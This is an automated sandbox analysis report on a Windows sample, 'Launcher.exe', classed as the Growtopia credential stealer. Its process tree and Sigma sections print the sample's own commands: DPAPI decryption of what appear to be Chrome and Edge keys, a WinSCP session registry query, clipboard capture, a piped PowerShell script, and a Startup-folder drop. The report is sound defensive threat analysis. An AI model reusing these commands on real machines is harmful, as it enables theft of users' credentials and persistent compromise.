Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Launcher.exe

Overview

General Information

Sample name:Launcher.exe
Analysis ID:1632293
MD5:b3670f482f26691a50a85376ddde32ad
SHA1:48b5c319abdf25365f3613893139f4f5c2f011f5
SHA256:c67dc6e962a28b421cdff1b27d9efa4ba97c3d467f2e21766d168c66b971926b
Infos:

Detection

Growtopia
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Growtopia
Drops PE files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Overwrites Mozilla Firefox settings
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Enumeration for 3rd Party Creds From CLI
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64_ra
  • Launcher.exe (PID: 5496 cmdline: "C:\Users\user\Desktop\Launcher.exe" MD5: B3670F482F26691A50A85376DDDE32AD)
    • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6688 cmdline: C:\Windows\system32\cmd.exe /d /s /c "hostname" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • HOSTNAME.EXE (PID: 6032 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
    • cmd.exe (PID: 6544 cmdline: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7120 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5632 cmdline: powershell.exe -noprofile - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 3840 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 6344 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3D45.tmp" "c:\Users\user\AppData\Local\Temp\anq2mtqn\CSCF5995D8BF694D46AD6A4558D7F1AF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • reg.exe (PID: 4868 cmdline: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • cmd.exe (PID: 6432 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 1272 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 3004 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1852 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 3172 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2080 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 2292 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2544 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 3432 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6412 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4836 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5124 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4788 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6516 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 2664 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4740 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6136 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6448 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6840 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3392 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5800 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6372 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5904 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5632 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6428 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3416 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4804 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4656 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4580 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6732 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 816 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4628 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
GrowtopiaAccording to PCrisk, Growtopia (also known as CyberStealer) is an information stealer written in the C# programming language. It can obtain system information, steal information from various applications, and capture screenshots. Its developer claims that it has created this software for educational purposes only. This stealer uses the name of a legitimate online game.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.growtopia

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: Launcher.exe PID: 5496JoeSecurity_GrowtopiaYara detected GrowtopiaJoe Security
      Process Memory Space: Launcher.exe PID: 5496JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Sigma Signatures

        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -noprofile -, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", ProcessId: 3840, ProcessName: csc.exe
        Sigma detected: Enumeration for 3rd Party Creds From CLI
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", CommandLine: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", CommandLine|base64offset|contains: AA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 5496, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", ProcessId: 4868, ProcessName: reg.exe
        Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 5496, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", ProcessId: 2292, ProcessName: cmd.exe
        Sigma detected: PowerShell Script Run in AppData
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 5496, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", ProcessId: 6544, ProcessName: cmd.exe
        Sigma detected: Startup Folder File Write
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Launcher.exe, ProcessId: 5496, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe
        Sigma detected: Dynamic CSharp Compile Artefact
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5632, TargetFilename: C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -noprofile -, CommandLine: powershell.exe -noprofile -, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6544, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -noprofile -, ProcessId: 5632, ProcessName: powershell.exe
        Sigma detected: Suspicious Execution of Hostname
        Source: Process startedAuthor: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "hostname", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6688, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 6032, ProcessName: HOSTNAME.EXE

        Data Obfuscation

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious location
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -noprofile -, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", ProcessId: 3840, ProcessName: csc.exe

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: Launcher.exeAvira: detected
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeReversingLabs: Detection: 34%
        Multi AV Scanner detection for submitted file
        Source: Launcher.exeReversingLabs: Detection: 34%
        Source: Launcher.exeVirustotal: Detection: 48%Perma Link
        Joe Sandbox ML detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.6% probability
        Source: Launcher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: D:\a\dpapi\dpapi\build\Release\dpapi.pdb source: Launcher.exe, 00000000.00000003.1498567944.0000017526712000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1515067184.0000017526090000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\node-sqlite3\node-sqlite3\build\Release\node_sqlite3.pdb source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1338150455.000001752651D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\catroot2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\AppxSip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\OpcServices.DLL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\96630093aeac18623f8eafa5a10c8ba7\System.Data.ni.dll
        Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: global trafficDNS traffic detected: DNS query: canary.discord.com
        Source: global trafficDNS traffic detected: DNS query: discord.com
        Source: Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://allyoucanleet.com/)
        Source: Launcher.exe, 00000000.00000003.1392827074.000000426BF01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me)
        Source: Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1307740753.00000175264EC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.00000175262B7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1316418767.00000175263BC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1262296562.00000175262B7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1283123422.000001752624B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.000001752656E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me/)
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me/)t
        Source: Launcher.exe, 00000000.00000003.1265642804.00000175262C2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1258032982.000001752630E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1247222794.0000030CA43C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1252239907.00000175260C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me/post/59142742143/designing-apis-for-asynchrony)
        Source: Launcher.exe, 00000000.00000003.1380649401.000000017A6C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.00000175262A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://christalkington.com/
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
        Source: Launcher.exe, 00000000.00000003.1269086365.00000175262BB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1252239907.00000175260B9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1258032982.000001752630E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1247222794.0000030CA43C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://connalle.blogspot.com/2013/10/topological-sortingkahn-algorithm.html
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1519009101.00000175265C6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crestidg.com)
        Source: Launcher.exe, 00000000.00000003.1234347587.00000175260DE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1233378920.000001752618F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://debuggable.com/)
        Source: Launcher.exe, 00000000.00000003.1510412634.0000020C2CC41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://digitalbazaar.com/
        Source: Launcher.exe, 00000000.00000003.1271970158.0000017526311000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.00000175260F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ecma-international.org/ecma-262/7.0/#sec-object.keys)
        Source: Launcher.exe, 00000000.00000003.1279400682.0000017526527000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.0000017526508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526311000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.000001752651F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.0000017526513000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.0000017526259000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.00000175260F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ecma-international.org/ecma-262/7.0/#sec-object.prototype.tostring)
